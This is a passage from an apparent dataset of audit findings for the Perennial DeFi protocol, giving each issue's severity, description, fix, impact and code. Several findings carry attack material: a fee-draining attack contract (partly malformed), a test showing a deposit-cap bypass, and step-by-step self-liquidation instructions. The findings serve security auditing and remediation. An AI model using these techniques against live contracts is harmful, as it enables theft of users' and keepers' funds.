LEVERAGE_BUFFER) / leverage`\\n`newLeverage = newPosition / newCollateral = leverage * (currentPosition - closable) / (currentPosition - closable * LEVERAGE_BUFFER)`\\n`= leverage / (1 - (LEVERAGE_BUFFER - 1) * closable / (currentPosition - closable))`\\nAs can be seen, the new leverage can be any amount and the formula doesn't make much sense, it certainly doesn't limit new leverage factor to LEVERAGE_BUFFER (denominator can be 0, negative or any small value, meaning leverage can be any number as high as you want). I think what developers wanted, is to have:\\n`newPosition = currentPosition - closable`\\n`newCollateral = newPosition / (leverage * LEVERAGE_BUFFER)`\\n`newLeverage = newPosition / (newPosition / (leverage * LEVERAGE_BUFFER)) = leverage * LEVERAGE_BUFFER`\\nNow, the important part to understand is that it's impossible to calculate delta collateral simply from delta position like it is now. When we know target newPosition, we can calculate target newCollateral, and then maxRedeem (delta collateral) can be calculated as currentCollateral - newCollateral:\\n`maxRedeem = currentCollateral - newCollateral`\\n`maxRedeem = currentCollateral - newPosition / (leverage * LEVERAGE_BUFFER)`\\nSo the fixed collateral calculation can be something like that:\\n```\\nUFixed6 deltaPosition = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable);\\nUFixed6 targetPosition = marketContext.currentAccountPosition.maker.sub(deltaPosition); // expected ideal position\\nUFixed6 targetCollateral = targetPosition.muldiv(marketContext.latestPrice.abs(), \\n registration.leverage.mul(StrategyLib.LEVERAGE_BUFFER)); // allow leverage to be higher by LEVERAGE_BUFFER\\nUFixed6 collateral = marketContext.local.collateral.sub(targetCollateral) // delta collateral\\n .muldiv(totalWeight, registration.weight); // market collateral => vault collateral\\n```\\nчMalicious user can put the vault at very high leverage, breaking important protocol invariant (leverage not exceeding target market leverage) and exposing the users to much higher potential funds loss / risk from the price movement due to high leverage and very high risk of vault liquidation, causing additional loss of funds from liquidation penalties and position re-opening fees.ч```\\nUFixed6 collateral = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable.mul(StrategyLib.LEVERAGE_BUFFER)) // available closable\\n .muldiv(marketContext.latestPrice.abs(), registration.leverage) // available collateral\\n .muldiv(totalWeight, registration.weight); // collateral in market\\n```\\n -Vault max redeem calculations limit redeem amount to the smallest position size in underlying markets which can lead to very small max redeem amount even with huge TVL vaultчhighчWhen redeeming from the vault, maximum amount allowed to be redeemed is limited by current opened position in each underlying market (the smallest opened position adjusted for weight). However, if any one market has its maker close to maker limit, the vault will open very small position, limited by maker limit. But now all redeems will be limited by this very small position for no reason: when almost any amount is redeemed, the vault will attempt to increase (not decrease) position in such market, so there is no sense in limiting redeem amount to the smallest position.\\nThis issue can create huge problems for users with large deposits. For example, if the user has deposited $10M to the vault, but due to one of the underlying markets the max redeem amount is only $1, user will need to do 10M transactions to redeem his full amount (which will not make sense due to gas).\\nVault's `maxRedeem` is calculated for each market as:\\n```\\nUFixed6 collateral = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable.mul(StrategyLib.LEVERAGE_BUFFER)) // available closable\\n .muldiv(marketContext.latestPrice.abs(), registration.leverage) // available collateral\\n .muldiv(totalWeight, registration.weight); // collateral in market\\n\\nredemptionAssets = redemptionAssets.min(collateral);\\n```\\n\\n`closable` is limited by the vault's settled and current positions in the market. As can be seen from the calculation, redeem amount is limited by vault's position in the market. However, if the position is far from target due to different market limitations, this doesn't make much sense. For example, if vault has $2M deposts and there are 2 underlying markets, each with weight 1, and:\\nIn Market1 vault position is worth $1 (target position = $1M)\\nIn Market2 vault position is worth $1M (target position = $1M)\\nThe `maxRedeem` will be limited to $1, even though redeeming any amount up to $999999 will only make the vault attempt to increase position in Market1 rather than decrease.\\nThere is also an opposite situation possible, when current position is higher than target position (due to LEVERAGE_BUFFER). This will make maxredeem too high. For example, similar example to previous, but:\\nIn Market1 vault position is worth $1.2M (target position = $1M)\\nIn Market2 vault position is worth $1.2M (target position = $1M)\\nThe `maxRedeem` will be limited to $1.44M (due to LEVERAGE_BUFFER), without even comparing the current collateral (which is just $1M per market), based only on position size.чConsider calculating max redeem by comparing target position vs current position and then target collateral vs current collateral instead of using only current position for calculations. This might be somewhat complex, because it will require to re-calculate allocation amounts to compare target vs current position. Possibly max redeem should not be limited as a separate check, but rather as part of the `allocate()` calculations (reverting if the actual leverage is too high in the end)чWhen vault's position is small in any underlying market due to maker limit, the max redeem amount in the vault will be very small, which will force users with large deposits to use a lot of transactions to redeem it (they'll lose funds to gas) or it might even be next to impossible to do at all (if, for example, user has a deposit of $10M and max redeem = $1), in such case the redeems are basically broken and not possible to do.ч```\\nUFixed6 collateral = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable.mul(StrategyLib.LEVERAGE_BUFFER)) // available closable\\n .muldiv(marketContext.latestPrice.abs(), registration.leverage) // available collateral\\n .muldiv(totalWeight, registration.weight); // collateral in market\\n\\nredemptionAssets = redemptionAssets.min(collateral);\\n```\\n -Attacker can call `KeeperFactory#settle` with empty arrays as input parameters to steal all keeper feesчhighчAnyone can call `KeeperFactory#request`, inputting empty arrays as parameters, and the call will succeed, and the caller receives a fee.\\nAttacker can perform this attack many times within a loop to steal ALL keeper fees from protocol.\\nExpected Workflow:\\nUser calls `Market#update` to open a new position\\nMarket calls `Oracle#request` to request a new oracleVersion\\nThe User's account gets added to a callback array of the market\\nOnce new oracleVersion gets committed, keepers can call `KeeperFactory#settle`, which will call `Market#update` on accounts in the Market's callback array, and pay the keeper(i.e. caller) a fee.\\n`KeeperFactory#settle` call will fail if there is no account to settle(i.e. if callback array is empty)\\nAfter settleing an account, it gets removed from the callback array\\nThe issue:\\nHere is KeeperFactory#settle function:\\n```\\nfunction settle(bytes32[] memory ids, IMarket[] memory markets, uint256[] memory versions, uint256[] memory maxCounts)\\n external\\n keep(settleKeepConfig(), msg.data, 0, \"\")\\n{\\n if (\\n ids.length != markets.length ||\\n ids.length != versions.length ||\\n ids.length != maxCounts.length ||\\n // Prevent calldata stuffing\\n abi.encodeCall(KeeperFactory.settle, (ids, markets, versions, maxCounts)).length != msg.data.length\\n )\\n revert KeeperFactoryInvalidSettleError();\\n\\n for (uint256 i; i < ids.length; i++)\\n IKeeperOracle(address(oracles[ids[i]])).settle(markets[i], versions[i], maxCounts[i]);\\n}\\n```\\n\\nAs we can see, function does not check if the length of the array is 0, so if user inputs empty array, the for loop will not be entered, but the keeper still receives a fee via the `keep` modifier.\\nAttacker can have a contract perform the attack multiple times in a loop to drain all fees:\\n```\\ninterface IKeeperFactory{\\n function settle(bytes32[] memory ids,IMarket[] memory markets,uint256[] memory versions,uint256[] memory maxCounts\\n ) external;\\n}\\n\\ninterface IMarket(\\n function update()external;\\n)\\n\\ncontract AttackContract{\\n\\n address public attacker;\\n address public keeperFactory;\\n IERC20 public keeperToken;\\n\\n constructor(address perennialDeployedKeeperFactory, IERC20 _keeperToken){\\n attacker=msg.sender;\\n keeperFactory=perennialDeployedKeeperFactory;\\n keeperToken=_keeperToken;\\n }\\n\\n function attack()external{\\n require(msg.sender==attacker,\"not allowed\");\\n\\n bool canSteal=true;\\n\\n // empty arrays as parameters\\n bytes32[] memory ids=[];\\n IMarket[] memory markets=[];\\n uint256[] versions=[];\\n uint256[] maxCounts=[];\\n\\n // perform attack in a loop till all funds are drained or call reverts\\n while(canSteal){\\n try IKeeperFactory(keeperFactory).settle(ids,markets,versions,maxCounts){\\n //\\n }catch{\\n canSteal=false;\\n }\\n }\\n keeperToken.transfer(msg.sender, keeperToken.balanceOf(address(this)));\\n }\\n}\\n```\\nчWithin KeeperFactory#settle function, revert if ids.length==0:\\n```\\nfunction settle(\\n bytes32[] memory ids,\\n IMarket[] memory markets,\\n uint256[] memory versions,\\n uint256[] memory maxCounts\\n)external keep(settleKeepConfig(), msg.data, 0, \"\") {\\n if (\\n++++ ids.length==0 ||\\n ids.length != markets.length ||\\n ids.length != versions.length ||\\n ids.length != maxCounts.length ||\\n // Prevent calldata stuffing\\n abi.encodeCall(KeeperFactory.settle, (ids, markets, versions, maxCounts)).length != msg.data.length\\n ) revert KeeperFactoryInvalidSettleError();\\n\\n for (uint256 i; i < ids.length; i++)\\n IKeeperOracle(address(oracles[ids[i]])).settle(markets[i], versions[i], maxCounts[i]);\\n}\\n```\\nчAll keeper fees can be stolen from protocol, and there will be no way to incentivize Keepers to commitRequested oracle version, and other keeper tasksч```\\nfunction settle(bytes32[] memory ids, IMarket[] memory markets, uint256[] memory versions, uint256[] memory maxCounts)\\n external\\n keep(settleKeepConfig(), msg.data, 0, \"\")\\n{\\n if (\\n ids.length != markets.length ||\\n ids.length != versions.length ||\\n ids.length != maxCounts.length ||\\n // Prevent calldata stuffing\\n abi.encodeCall(KeeperFactory.settle, (ids, markets, versions, maxCounts)).length != msg.data.length\\n )\\n revert KeeperFactoryInvalidSettleError();\\n\\n for (uint256 i; i < ids.length; i++)\\n IKeeperOracle(address(oracles[ids[i]])).settle(markets[i], versions[i], maxCounts[i]);\\n}\\n```\\n -MultiInvoker doesn't pay keepers refund for l1 calldataчmediumчMultiInvoker doesn't pay keepers refund for l1 calldata, as result keepers can be not incentivized to execute orders.\\nMultiInvoker contract allows users to create orders, which then can be executed by keepers. For his job, keeper receives fee from order's creator. This fee payment is handled by `_handleKeep` function.\\nThe function will call `keep` modifier and will craft `KeepConfig` which contains `keepBufferCalldata`, which is flat fee for l1 calldata of this call.\\n```\\n modifier keep(\\n KeepConfig memory config,\\n bytes calldata applicableCalldata,\\n uint256 applicableValue,\\n bytes memory data\\n ) {\\n uint256 startGas = gasleft();\\n\\n\\n _;\\n\\n\\n uint256 applicableGas = startGas - gasleft();\\n (UFixed18 baseFee, UFixed18 calldataFee) = (\\n _baseFee(applicableGas, config.multiplierBase, config.bufferBase),\\n _calldataFee(applicableCalldata, config.multiplierCalldata, config.bufferCalldata)\\n );\\n\\n\\n UFixed18 keeperFee = UFixed18.wrap(applicableValue).add(baseFee).add(calldataFee).mul(_etherPrice());\\n _raiseKeeperFee(keeperFee, data);\\n keeperToken().push(msg.sender, keeperFee);\\n\\n\\n emit KeeperCall(msg.sender, applicableGas, applicableValue, baseFee, calldataFee, keeperFee);\\n }\\n```\\n\\nThis modifier should calculate amount of tokens that should be refunded to user and then raise it. We are interested not in whole modifier, but in calldata handling. To do that we call `_calldataFee` function. This function does nothing in the `Kept` contract and is overrided in the `Kept_Arbitrum` and `Kept_Optimism`.\\nThe problem is that MultiInvoker is only one and it just extends `Keept`. As result his `_calldataFee` function will always return 0, which means that calldata fee will not be added to the refund of keeper.чYou need to implement 2 versions of MultiInvoker: for optimism(Kept_Optimism) and arbitrum(Kept_Arbitrum).чKeeper will not be incentivized to execute orders.ч```\\n modifier keep(\\n KeepConfig memory config,\\n bytes calldata applicableCalldata,\\n uint256 applicableValue,\\n bytes memory data\\n ) {\\n uint256 startGas = gasleft();\\n\\n\\n _;\\n\\n\\n uint256 applicableGas = startGas - gasleft();\\n (UFixed18 baseFee, UFixed18 calldataFee) = (\\n _baseFee(applicableGas, config.multiplierBase, config.bufferBase),\\n _calldataFee(applicableCalldata, config.multiplierCalldata, config.bufferCalldata)\\n );\\n\\n\\n UFixed18 keeperFee = UFixed18.wrap(applicableValue).add(baseFee).add(calldataFee).mul(_etherPrice());\\n _raiseKeeperFee(keeperFee, data);\\n keeperToken().push(msg.sender, keeperFee);\\n\\n\\n emit KeeperCall(msg.sender, applicableGas, applicableValue, baseFee, calldataFee, keeperFee);\\n }\\n```\\n -It is possible to open and liquidate your own position in 1 transaction to overcome efficiency and liquidity removal limits at almost no costчmediumчIn 2.0 audit the issue 104 was fixed but not fully and it's still possible, in a slightly different way. This wasn't found in the fix review contest. The fix introduced margined and maintained amounts, so that margined amount is higher than maintained one. However, when collateral is withdrawn, only the current (pending) position is checked by margined amount, the largest position (including latest settled) is checked by maintained amount. This still allows to withdraw funds up to the edge of being liquidated, if margined current position amount <= maintained settled position amount. So the new way to liquidate your own position is to reduce your position and then do the same as in 2.0 issue.\\nThis means that it's possible to be at almost liquidation level intentionally and moreover, the current oracle setup allows to open and immediately liquidate your own position in 1 transaction, effectively bypassing efficiency and liquidity removal limits, paying only the keeper (and possible position open/close) fees, causing all kinds of malicious activity which can harm the protocol.\\n`Market._invariant` verifies margined amount only for the current position:\\n```\\nif (\\n !context.currentPosition.local.margined(context.latestVersion, context.riskParameter, context.pendingCollateral)\\n) revert MarketInsufficientMarginError();\\n```\\n\\nAll the other checks (max pending position, including settled amount) are for maintained amount:\\n```\\nif (\\n !PositionLib.maintained(context.maxPendingMagnitude, context.latestVersion, context.riskParameter, context.pendingCollateral)\\n) revert MarketInsufficientMaintenanceError();\\n```\\n\\nThe user can liquidate his own position with 100% guarantee in 1 transaction by following these steps:\\nIt can be done only on existing settled position\\nRecord Pyth oracle prices with signatures until you encounter a price which is higher (or lower, depending on your position direction) than latest oracle version price by any amount.\\nIn 1 transaction do the following: 3.1. Reduce your position by `(margin / maintenance)` and make the position you want to liquidate at exactly the edge of liquidation: withdraw maximum allowed amount. Position reduction makes margined(current position) = maintained(settled position), so it's possible to withdraw up to be at the edge of liquidation. 3.2. Commit non-requested oracle version with the price recorded earlier (this price makes the position liquidatable) 3.3. Liquidate your position (it will be allowed, because the position generates a minimum loss due to price change and becomes liquidatable)\\nSince all liquidation fee is given to user himself, liquidation of own position is almost free for the user (only the keeper and position open/close fee is paid if any).чIf collateral is withdrawn or order increases position, verify `maxPendingMagnitude` with `margined` amount. If position is reduced or remains unchanged AND collateral is not withdrawn, only then `maxPendingMagnitude` can be verified with `maintained` amount.чThere are different malicious actions scenarios possible which can abuse this issue and overcome efficiency and liquidity removal limitations (as they're ignored when liquidating positions), such as:\\nCombine with the other issues for more severe effect to be able to abuse them in 1 transaction (for example, make `closable = 0` and liquidate your position while increasing to max position size of 2^62-1 - all in 1 transaction)\\nOpen large maker and long or short position, then liquidate maker to cause mismatch between long/short and maker (socialize positions). This will cause some chaos in the market, disbalance between long and short profit/loss and users will probably start leaving such chaotic market, so while this attack is not totally free, it's cheap enough to drive users away from competition.\\nOpen large maker, wait for long and/or short positions from normal users to accumulate, then liquidate most of the large maker position, which will drive taker interest very high and remaining small maker position will be able to accumulate big profit with a small risk.ч```\\nif (\\n !context.currentPosition.local.margined(context.latestVersion, context.riskParameter, context.pendingCollateral)\\n) revert MarketInsufficientMarginError();\\n```\\n -Invalid oracle version can cause the `maker` position to exceed `makerLimit`, temporarily or permanently bricking the Market contractчmediumчWhen invalid oracle version happens, positions pending at the oracle version are invalidated with the following pending positions increasing or decreasing in size. When this happens, all position limit checks are not applied (and can't be cancelled/modified), but they are still verified for the final positions in _invariant. This means that many checks are bypassed during such event. There is a protection against underflow due to this problem by enforcing the calculated `closable` value to be 0 or higher. However, exactly the same problem can happen with overflow and there is no protection against it.\\nFor example:\\nLatest global maker = maker limit = 1000\\nPending global maker = 500 [t=100]\\nPending global maker = 1000 [t=200]\\nIf oracle version at t = 100 is invalid, then pending global maker = 1500 (at t = 200). However, due to this check in _invariant:\\n```\\nif (context.currentPosition.global.maker.gt(context.riskParameter.makerLimit))\\n revert MarketMakerOverLimitError();\\n```\\n\\nall Market updates will revert except update to reduce maker position by 500+, which might not be even possible in 1 update depending on maker distribution between users. For example, if 5 users have maker = 300 (1500 total), then no single user can update to reduce maker by 500. This will temporarily brick Market (all updates will revert) until coordinator increases maker limit. If the limit is already close to max possible (2^62-1), then the contract will be bricked permanently (all updates will revert regardless of maker limit, because global maker will exceed 2^62-1 in calculations and will revert when trying to store it).\\nThe same issue can also cause the other problems, such as:\\nBypassing the market utilization limit if long/short is increased above maker\\nUser unexpectedly becomes liquidatable with too high position (for example: position 500 -> pending 0 -> pending 500 - will make current = 1000 if middle oracle version is invalid)чThe same issue for underflow is already resolved by using `closable` and enforcing such pending positions that no invalid oracle can cause the position to be less than 0. This issue can be resolved in the same way, by introducing some `opeanable` value (calculated similar to `closable`, but in reverse - when position is increased, it's increased, when position is decreased, it doesn't change) and enforcing different limits, such that settled position + openable:\\ncan not exceed the max maker\\ncan not break utilization\\nfor local position - calculate maxMagnitude amount from `settled + local openable` instead of absolute pending position values for margined/maintained calculations.чIf current maker is close to maker limit, and some user(s) reduce their maker then immediately increase back, and the oracle version is invalid, maker will be above the maker limit and the Market will be temporarily bricked until coordinator increases the maker limit. Even though it's temporary, it still bricked for some time and coordinator is forced to increase maker limit, breaking the intended market config. Furthermore, once the maker limit is increased, there is no guarantee that the users will reduce it so that the limit can be reduced back.\\nAlso, for some low-price tokens, the maker limit can be close to max possible value (2^62-1 is about `4*1e18` or Fixed6(4*1e12)). If the token price is about $0.00001, this means such maker limit allows `$4*1e7` or $40M. So, if low-value token with $40M maker limit is used, this issue will lead to maker overflow 2^62-1 and bricking the Market permanently, with all users being unable to withdraw their funds, losing everything.\\nWhile this situation is not very likely, it's well possible. For example, if the maker is close to limit, any maker reducing the position will have some other user immediately take up the freed up maker space, so things like global maker change of: 1000->900->1000 are easily possible and any invalid oracle version will likely cause the maker overflowing the limit.ч```\\nif (context.currentPosition.global.maker.gt(context.riskParameter.makerLimit))\\n revert MarketMakerOverLimitError();\\n```\\n -`KeeperOracle.request` adds only the first pair of market+account addresses per oracle version to callback list, ignoring all the subsequent onesчmediumчThe new feature introduced in 2.1 is the callback called for all markets and market+account pairs which requested the oracle version. These callbacks are called once the corresponding oracle settles. For this reason, `KeeperOracle` keeps a list of markets and market+account pairs per oracle version to call market.update on them:\\n```\\n/// @dev Mapping from version to a set of registered markets for settlement callback\\nmapping(uint256 => EnumerableSet.AddressSet) private _globalCallbacks;\\n\\n/// @dev Mapping from version and market to a set of registered accounts for settlement callback\\nmapping(uint256 => mapping(IMarket => EnumerableSet.AddressSet)) private _localCallbacks;\\n```\\n\\nHowever, currently `KeeperOracle` stores only the market+account from the first request call per oracle version, because if the request was already made, it returns from the function before adding to the list:\\n```\\nfunction request(IMarket market, address account) external onlyAuthorized {\\n uint256 currentTimestamp = current();\\n@@@ if (versions[_global.currentIndex] == currentTimestamp) return;\\n\\n versions[++_global.currentIndex] = currentTimestamp;\\n emit OracleProviderVersionRequested(currentTimestamp);\\n\\n // @audit only the first request per version reaches these lines to add market+account to callback list\\n _globalCallbacks[currentTimestamp].add(address(market));\\n _localCallbacks[currentTimestamp][market].add(account);\\n emit CallbackRequested(SettlementCallback(market, account, currentTimestamp));\\n}\\n```\\n\\nAccording to docs, the same `KeeperOracle` can be used by multiple markets. And every account requesting in the same oracle version is supposed to be called back (settled) once the oracle version settles.чMove addition to callback list to just before the condition to exit function early:\\n```\\nfunction request(IMarket market, address account) external onlyAuthorized {\\n uint256 currentTimestamp = current();\\n _globalCallbacks[currentTimestamp].add(address(market));\\n _localCallbacks[currentTimestamp][market].add(account);\\n emit CallbackRequested(SettlementCallback(market, account, currentTimestamp));\\n if (versions[_global.currentIndex] == currentTimestamp) return;\\n\\n versions[++_global.currentIndex] = currentTimestamp;\\n emit OracleProviderVersionRequested(currentTimestamp);\\n}\\n```\\nчThe new core function of the protocol doesn't work as expected and `KeeperOracle` will fail to call back markets and accounts if there is more than 1 request in the same oracle version (which is very likely).ч```\\n/// @dev Mapping from version to a set of registered markets for settlement callback\\nmapping(uint256 => EnumerableSet.AddressSet) private _globalCallbacks;\\n\\n/// @dev Mapping from version and market to a set of registered accounts for settlement callback\\nmapping(uint256 => mapping(IMarket => EnumerableSet.AddressSet)) private _localCallbacks;\\n```\\n -`KeeperOracle.commit` will revert and won't work for all markets if any single `Market` is paused.чmediumчAccording to protocol design (from KeeperOracle comments), multiple markets may use the same KeeperOracle instance:\\n```\\n/// @dev One instance per price feed should be deployed. Multiple products may use the same\\n/// KeeperOracle instance if their payoff functions are based on the same underlying oracle.\\n/// This implementation only supports non-negative prices.\\n```\\n\\nHowever, if `KeeperOracle` is used by several `Market` instances, and one of them makes a request and is then paused before the settlement, `KeeperOracle` will be temporarily bricked until `Market` is unpaused. This happens, because `KeeperOracle.commit` will revert in market callback, as `commit` iterates through all requested markets and calls `update` on all of them, and `update` reverts if the market is paused.\\nThis means that pausing of just 1 market will basically stop trading in all the other markets which use the same `KeeperOracle`, disrupting protocol usage. When `KeeperOracle.commit` always reverts, it's also impossible to switch oracle provider from upstream `OracleFactory`, because provider switch still requires the latest version of previous oracle to be commited, and it will be impossible to commit it (both valid or invalid, requested or unrequested).\\nAdditionally, the market's `update` can also revert for some other reasons, for example if maker exceeds the maker limit after invalid oracle as described in the other issue.\\nAnd for another problem (although a low severity, but caused in the same lines), if too many markets are authorized to call `KeeperOracle.request`, the markets callback gas usage might exceed block limit, making it impossible to call `commit` due to not enough gas. Currently there is no limit of the amount of Markets which can be added to callback queue.\\n`KeeperOracle.commit` calls back `update` in all markets which called `request` in the oracle version:\\n```\\nfor (uint256 i; i < _globalCallbacks[version.timestamp].length(); i++)\\n _settle(IMarket(_globalCallbacks[version.timestamp].at(i)), address(0));\\n// rest of code\\nfunction _settle(IMarket market, address account) private {\\n market.update(account, UFixed6Lib.MAX, UFixed6Lib.MAX, UFixed6Lib.MAX, Fixed6Lib.ZERO, false);\\n}\\n```\\n\\nIf any `Market` is paused, its `update` function will revert (notice the `whenNotPaused` modifier):\\n```\\n function update(\\n address account,\\n UFixed6 newMaker,\\n UFixed6 newLong,\\n UFixed6 newShort,\\n Fixed6 collateral,\\n bool protect\\n ) external nonReentrant whenNotPaused {\\n```\\n\\nThis means that if any `Market` is paused, all the other markets will be unable to continue trading since `commit` in their oracle provider will revert. It will also be impossible to successfully switch to a new provider for these markets, because previous oracle provider must still `commit` its latest request before fully switching to a new oracle provider:\\n```\\nfunction _latestStale(OracleVersion memory currentOracleLatestVersion) private view returns (bool) {\\n if (global.current == global.latest) return false;\\n if (global.latest == 0) return true;\\n\\n@@@ if (uint256(oracles[global.latest].timestamp) > oracles[global.latest].provider.latest().timestamp) return false;\\n if (uint256(oracles[global.latest].timestamp) >= currentOracleLatestVersion.timestamp) return false;\\n\\n return true;\\n}\\n```\\nчConsider catching and ignoring revert, when calling `update` for the market in the `_settle` (wrap in try .. catch).\\nConsider adding a limit of the number of markets which are added to callback queue in each oracle version, or alternatively limit the number of authorized markets to call `request`.чOne paused market will stop trading in all the markets which use the same oracle provider (KeeperOracle).ч```\\n/// @dev One instance per price feed should be deployed. Multiple products may use the same\\n/// KeeperOracle instance if their payoff functions are based on the same underlying oracle.\\n/// This implementation only supports non-negative prices.\\n```\\n -Vault `_maxDeposit` incorrect calculation allows to bypass vault deposit capчmediumчVault has a deposit cap risk setting, which is the max amount of funds users can deposit into the vault. The problem is that `_maxDeposit` function, which calculates max amount of assets allowed to be deposited is incorrect and always includes vault claimable assets even when the vault is at the cap. This allows malicious (or even regular) user to deposit unlimited amount bypassing the vault cap, if the vault has any assets redeemed but not claimed yet. This breaks the core protocol function which limits users risk, for example when the vault is still in the testing phase and owner wants to limit potential losses in case of any problems.\\n`Vault._update` limits the user deposit to `_maxDeposit()` amount:\\n```\\n if (depositAssets.gt(_maxDeposit(context)))\\n revert VaultDepositLimitExceededError();\\n// rest of code\\nfunction _maxDeposit(Context memory context) private view returns (UFixed6) {\\n if (context.latestCheckpoint.unhealthy()) return UFixed6Lib.ZERO;\\n UFixed6 collateral = UFixed6Lib.from(totalAssets().max(Fixed6Lib.ZERO)).add(context.global.deposit);\\n return context.global.assets.add(context.parameter.cap.sub(collateral.min(context.parameter.cap)));\\n}\\n```\\n\\nWhen calculating max deposit, the vault's collateral consists of vault assets as well as assets which are redeemed but not yet claimed. However, the formula used to calculate max deposit is incorrect, it is:\\n`maxDeposit = claimableAssets + (cap - min(collateral, cap))`\\nAs can be seen from the formula, regardless of cap and current collateral, maxDeposit will always be at least claimableAssets, even when the vault is already at the cap or above cap, which is apparently wrong. The correct formula should subtract claimableAssets from collateral (or 0 if claimableAssets is higher than collateral) instead of adding it to the result:\\n`maxDeposit = cap - min(collateral - min(collateral, claimableAssets), cap)`\\nCurrent incorrect formula allows to deposit up to claimable assets amount even when the vault is at or above cap. This can either be used by malicious user (user can deposit up to cap, redeem, deposit amount = up to cap + claimable, redeem, ..., repeat until target deposit amount is reached) or can happen itself when there are claimable assets available and vault is at the cap (which can easily happen by itself if some user forgets to claim or it takes long time to claim).\\nBypass of vault cap is demonstrated in the test, add this to Vault.test.ts:\\n```\\nit('bypass vault deposit cap', async () => {\\n console.log(\"start\");\\n\\n await vault.connect(owner).updateParameter({\\n cap: parse6decimal('100'),\\n });\\n\\n await updateOracle()\\n\\n var deposit = parse6decimal('100')\\n console.log(\"Deposit 100\")\\n await vault.connect(user).update(user.address, deposit, 0, 0)\\n\\n await updateOracle()\\n await vault.settle(user.address);\\n\\n var assets = await vault.totalAssets();\\n console.log(\"Vault assets: \" + assets);\\n\\n // additional deposit reverts due to cap\\n var deposit = parse6decimal('10')\\n console.log(\"Deposit 10 revert\")\\n await expect(vault.connect(user).update(user.address, deposit, 0, 0)).to.be.reverted;\\n\\n // now redeem 50\\n var redeem = parse6decimal('50')\\n console.log(\"Redeem 50\")\\n await vault.connect(user).update(user.address, 0, redeem, 0);\\n\\n await updateOracle()\\n await vault.settle(user.address);\\n\\n var assets = await vault.totalAssets();\\n console.log(\"Vault assets: \" + assets);\\n\\n // deposit 100 (50+100=150) doesn't revert, because assets = 50\\n var deposit = parse6decimal('100')\\n console.log(\"Deposit 100\")\\n await vault.connect(user).update(user.address, deposit, 0, 0);\\n\\n await updateOracle()\\n await vault.settle(user.address);\\n\\n var assets = await vault.totalAssets();\\n console.log(\"Vault assets: \" + assets);\\n\\n var deposit = parse6decimal('50')\\n console.log(\"Deposit 50\")\\n await vault.connect(user).update(user.address, deposit, 0, 0);\\n\\n await updateOracle()\\n await vault.settle(user.address);\\n\\n var assets = await vault.totalAssets();\\n console.log(\"Vault assets: \" + assets);\\n})\\n```\\n\\nConsole log from execution of the code above:\\n```\\nstart\\nDeposit 100\\nVault assets: 100000000\\nDeposit 10 revert\\nRedeem 50\\nVault assets: 50000000\\nDeposit 100\\nVault assets: 150000000\\nDeposit 50\\nVault assets: 200000000\\n```\\n\\nThe vault cap is set to 100 and is then demonstrated that it is bypassed and vault assets are set at 200 (and can be continued indefinitely)чThe correct formula to `_maxDeposit` should be:\\n`maxDeposit = cap - min(collateral - min(collateral, claimableAssets), cap)`\\nSo the code can be:\\n```\\nfunction _maxDeposit(Context memory context) private view returns (UFixed6) {\\n if (context.latestCheckpoint.unhealthy()) return UFixed6Lib.ZERO;\\n UFixed6 collateral = UFixed6Lib.from(totalAssets().max(Fixed6Lib.ZERO)).add(context.global.deposit);\\n return context.parameter.cap.sub(collateral.sub(context.global.assets.min(collateral)).min(context.parameter.cap));\\n}\\n```\\nчMalicious and regular users can bypass vault deposit cap, either intentionally or just in the normal operation when some users redeem and claimable assets are available in the vault. This breaks core contract security function of limiting the deposit amount and can potentially lead to big user funds loss, for example at the initial stages when the owner still tests the oracle provider/market/etc and wants to limit vault deposit if anything goes wrong, but gets unlimited deposits instead.ч```\\n if (depositAssets.gt(_maxDeposit(context)))\\n revert VaultDepositLimitExceededError();\\n// rest of code\\nfunction _maxDeposit(Context memory context) private view returns (UFixed6) {\\n if (context.latestCheckpoint.unhealthy()) return UFixed6Lib.ZERO;\\n UFixed6 collateral = UFixed6Lib.from(totalAssets().max(Fixed6Lib.ZERO)).add(context.global.deposit);\\n return context.global.assets.add(context.parameter.cap.sub(collateral.min(context.parameter.cap)));\\n}\\n```\\n -Pending keeper and position fees are not accounted for in vault collateral calculation which can be abused to liquidate vault when it's smallчmediumчVault opens positions in the underlying markets trying to keep leverage at the level set for each market by the owner. However, it uses sum of market collaterals which exclude keeper and position fees. But pending fees are included in account health calculations in the `Market` itself.\\nWhen vault TVL is high, this difference is mostly unnoticable. However, if vault is small and keeper fee is high enough, it's possible to intentionally add keeper fees by depositing minimum amounts from different accounts in the same oracle version. This keeps/increases vault calculated collateral, but its pending collateral in underlying markets reduces due to fees, which increases actual vault leverage, so it's possible to increase vault leverage up to maximum leverage possible and even intentionally liquidate the vault.\\nEven when the vault TVL is not low but keeper fee is large enough, the other issue reported allows to set vault leverage to max (according to margined amount) and then this issue allows to reduce vault collateral even further down to maintained amount and then commit slightly worse price and liquidate the vault.\\nWhen vault leverage is calculated, it uses collateral equal to sum of collaterals of all markets, loaded as following:\\n```\\n// local\\nLocal memory local = registration.market.locals(address(this));\\ncontext.latestIds.update(marketId, local.latestId);\\ncontext.currentIds.update(marketId, local.currentId);\\ncontext.collaterals[marketId] = local.collateral;\\n```\\n\\nHowever, market's `local.collateral` excludes pending keeper and position fees. But pending fees are included in account health calculations in the `Market` itself (when loading pending positions):\\n```\\n context.pendingCollateral = context.pendingCollateral\\n .sub(newPendingPosition.fee)\\n .sub(Fixed6Lib.from(newPendingPosition.keeper));\\n// rest of code\\n if (protected && (\\n !context.closable.isZero() || // @audit-issue even if closable is 0, position can still increase\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n@@@ context.pendingCollateral.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n )) revert MarketInvalidProtectionError();\\n// rest of code\\n if (\\n@@@ !context.currentPosition.local.margined(context.latestVersion, context.riskParameter, context.pendingCollateral)\\n ) revert MarketInsufficientMarginError();\\n\\n if (\\n@@@ !PositionLib.maintained(context.maxPendingMagnitude, context.latestVersion, context.riskParameter, context.pendingCollateral)\\n ) revert MarketInsufficientMaintenanceError();\\n```\\n\\nThis means that small vault deposits from different accounts will be used for fees, but these fees will not be counted in vault underlying 